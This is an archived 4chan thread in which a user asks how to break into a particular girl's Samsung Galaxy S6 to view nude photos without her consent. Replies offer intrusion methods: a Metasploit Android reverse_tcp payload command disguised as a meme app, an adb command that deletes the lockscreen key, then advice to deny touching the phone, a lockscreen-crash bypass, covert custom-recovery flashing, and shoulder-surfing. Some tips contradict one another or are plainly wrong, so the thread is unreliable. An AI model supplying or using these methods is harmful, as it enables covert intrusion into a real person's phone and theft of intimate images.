[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

Hi guys, is it possible to access the files on a samsung galaxy

The stories and information posted here are artistic works of fiction and falsehood.
Only a fool would take anything posted here as fact.

Thread replies: 78
Thread images: 3

File: 1.png (2MB, 1920x1090px) Image search: [Google]
1.png
2MB, 1920x1090px
Hi guys,
is it possible to access the files on a samsung galaxy S6 without knowing the password? I KNOW there are nudes on it.

Any chance? Like bruteforcing?
>>
no one?
>>
>>727745735
No chance
>>
>>727745735
Why do you want them so bad im interested?
>>
>>727747141
just have a crush on the girl which owns the smartphone
>>
>>727747266
Ok i might be able to help. Which state do you live in if in the us?
>>
>>727747302
If not in the US might be able to but it will be harder
>>
>>727745735

nice try, FBI
>>
Plug it into PC and look through file system
>>
>>727747490
>/
This
>>
>>727745735
boot into recovery, adb/fastboot. If device is not encrypted: profit!
>>
remove ssd from android phone and hook it up to pc if possible
>>
>>727747605
you, sir, are and idiot.
>>
>>727747443
Lol
>>
File: 1490993489328.png (211KB, 405x534px) Image search: [Google]
1490993489328.png
211KB, 405x534px
>>727747577
Yeah, this.
>>
>>727745735
get a usb cable to works on the s6, and take your laptop with you. take her phone, plug it to your laptop, it shouldn't be that difficult to find the folder where the pics gets saved to, copy them to your laptop, then put the phone back where you took it. if you're at school and your school has a lost and found, just leave it there and say you just found it
>>
>>727747640
why, most android phones have an ssd no, or is it just an expansion slot?
>>
it won't show up in recovery boot
>>
call it from another phone. answer it. click over to home screen.
>>
How active are people on /b/
>>
>>727747749
boot twrp
>>
>>727747725
i think smamsung got rid of the expandable storage option with the s6, can't remove the battery either. so getting the sd card isn't an option for op
>>
>>727747725
removing the sd card (which is not an ssd) might work, but only if the pics are not saved on the internal drive.
>>
>>727747605
you must be a mac user.

OP: plug it into a pc via usb and see if it shows up as a device, then browse to it.
>>
>>727747719
Once it's plugged into the laptop you need to unlock the phone to access the files jackass
>>
>>727747880
>>727747884
sorry, you're right. the s6 doesn't have an expansion slot.
>>
>>727747913
>>727747719
Once it's plugged into the laptop you need to unlock the phone to access the files jackass
>>
>>727747880
this...
no SD card, no battery...

are smartphones really this safe?
>>
>>727747880
I have the S7 Edge and its expandable.
>>
Omg, androids don't have crappy security... you can't really get in on Samsung's phones, the files are usually auto encrypted, and the phone must be unlocked to even be recognized by the computer for Samsung phones.
>>
>>727745735
stand behind her when she enters the password. or make up some story so that she tells you the password. social engineering > dirty tech tricks
>>
>>727745735
Give it back Tyrone
>>
>>727747884
SD card is a solid state drive you goon.
>>
>>727747913
not really, gtx 1070 i7 16 gb ram
>>
You need her Google account if you want to unlock her phone, otherwise it's pretty hard, it's not like iPhones where there are 3 ways to bypass the lock screen
>>
>>727748135
nope you shmock.
>>
Sd and ssds are alike, but not exactly the same
>>
File: (4).jpg (126KB, 1474x1106px) Image search: [Google]
(4).jpg
126KB, 1474x1106px
>>727748303
this
>>
Samsung phones have encryption enabled by default, and gets decrypted when unlocked, meaning you need to unlock her phone.
>>
>>727747490
you have to unlock it to see filesystem
>>
double click the home button so that her camera get's activated. take few pics. close, rinse and repeat and suddenly you will be able to access all files. But you won't be able to download them since you need full access to the phone to browse the files on your pc.

If the FS is encrpted, good luck. you will never be able to access it.
>>
This would be easier with an iphone
>>
>>727748626
That won't work either, the only pics you can see are the ones you took on the at that moment
>>
>>727748626
Forgot to tell, don't forget to delete the pics you just made before you close the screen again.
>>
>>727747266

How about instead of being an autistic faggot, you chat her up, get friendly, and get her nekkid in person? What kind of basement dwelling fedora faggot are you?
>>
>>727748720
The files won't come up on the computer, it won't even be recognized, you have to enable recognition while unlocked, and gets flocked once turned off
>>
>>727748718
Wrong, you just have to hammer it all the time, it will work. But as I have mentioned, you need to delete the pics all the time before you hit the power off button. leave no trace.
>>
>>727748799
I have an s7... I can see what works and what doesn't.
>>
>>727748799
I can't even see my phone on my computer until I select the option in my notification tray.
>>
>>727748792
I just told, you won't be able to download the files only see them. Just hammer it as I told repeat over and over again.
>>
Another option is if you are on the same network to use metasploit and take over her phone. The moment she's online you'll have access as long as it's on LAN. just load the script/send to her phone and enjoy browsing.
>>
take out the SD card if there is any and get an adapter to put it in your computer
>>
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
>>
>>727749057
You can't do that to her phone unless she's rooted and accepts the download/run
>>
>>727747709
Is this a new meme?
>>
>>727749067
S6 has no sd card, s5 and s7 does
>>
A magnet to the back may unlock... emulating a docking station
>>
You'll need to use Odin to flash a custom recovery like TWRP then from the recovery, just mount the storage and plug into a pc. After reboot, she won't even know it has a custom recovery on it.
>>
>>727749390
Can't do that unless her phone gets unlocked first
>>
>>727749428
You can if you mount it in recovery and do it in recovery mode.
>>
>>727749324
Yes you can, just need to make the payload. give it meme.apk name or so she downloads, installs and boom. People fall for many shit these days as long as they think it is something funny to cheer them up.
>>
>>727749473
No, recovery mode can't do it. Also the way you recover your password is by using your Google/Samsung password
>>
>>727749385
google
"magnet unlock phone"
POST WINS
>>
>>727745735
Just stop trying, it's almost impossible to get the pics without knowing one of her passwords, the app might work, but she's probably not stupid enough, and you're probably not smart enough.
>>
Take apart the entire device, and take the logic board out, then you replace the cpu because it saves the encryption, and get a new cpu and put it back together
>>
>>727745735
Ask her phone, tell her you want to check some setting and put her phone in USB debug mode.
Then next time, hook it up to your PC and type the following command.

adb shell rm /data/system/gesture.key

Then reboot the phone and the lockscreen should be gone.

Then once you got what you need, turn off the phone and always deny if she asks if you have touched her phone.

Have fun.
>>
First, tap the "Emergency Call" option on your lock screen, then use the dialer interface to enter 10 asterisks. From here, double-tap the field to highlight the entered text and choose "Copy," then paste it into the same field to essentially double the amount of entered characters. Repeat this same process of copying and pasting to add more characters until double-tapping the field no longer highlights the characters.

Next, head back to the lock screen and open the camera shortcut. From here, pull down the notification shade and tap the Settings icon, then you'll be prompted to enter a password. Long-press the input field and choose "Paste," then repeat this process several more times. Eventually, after you've pasted enough characters into the field, your lock screen will crash, which will allow you to access the rest of your phone's interface.
>>
>>727749988
Or just ask for her phone and while she's not looking, email (don't text) all the pics to yourself. Btw this is why I put my pics in the private setting, it's hidden from all files, and needs the password to unlock it.
>>
>>727749988
I downloaded the ADB drivers, but I still don't get "adb" executable in command shell
>>
>>727750139
Cause you don't have USB debug enabled on the phone it self.
>>
>>727745735
>talcum powder
just pour some and blow, see her dirty fingers that ran along the phone and just figure it out.
>>
>>727750085
That only worked in android 5 like 2 years ago, Google fixed that, it's literally a 1 line fix.
>>
>>727750185
Unless she used a finger print scanner, also the thing where people lift finger prints off of the phone is unrealistic, you don't out the right parts of your finger on the screen for the scanner.
>>
>>727750185
This has worked before
>>
>>727750185
What if she was texting or playing a game?
>>
>>727749636
MAGNET
>>
>>727750349
Op you unlock w magnet yet so we can see the nudes
>>
look for smear marks on screen for password if it is pattern. Take out SD card and put in other device, look through that
Thread posts: 78
Thread images: 3

[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/

If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.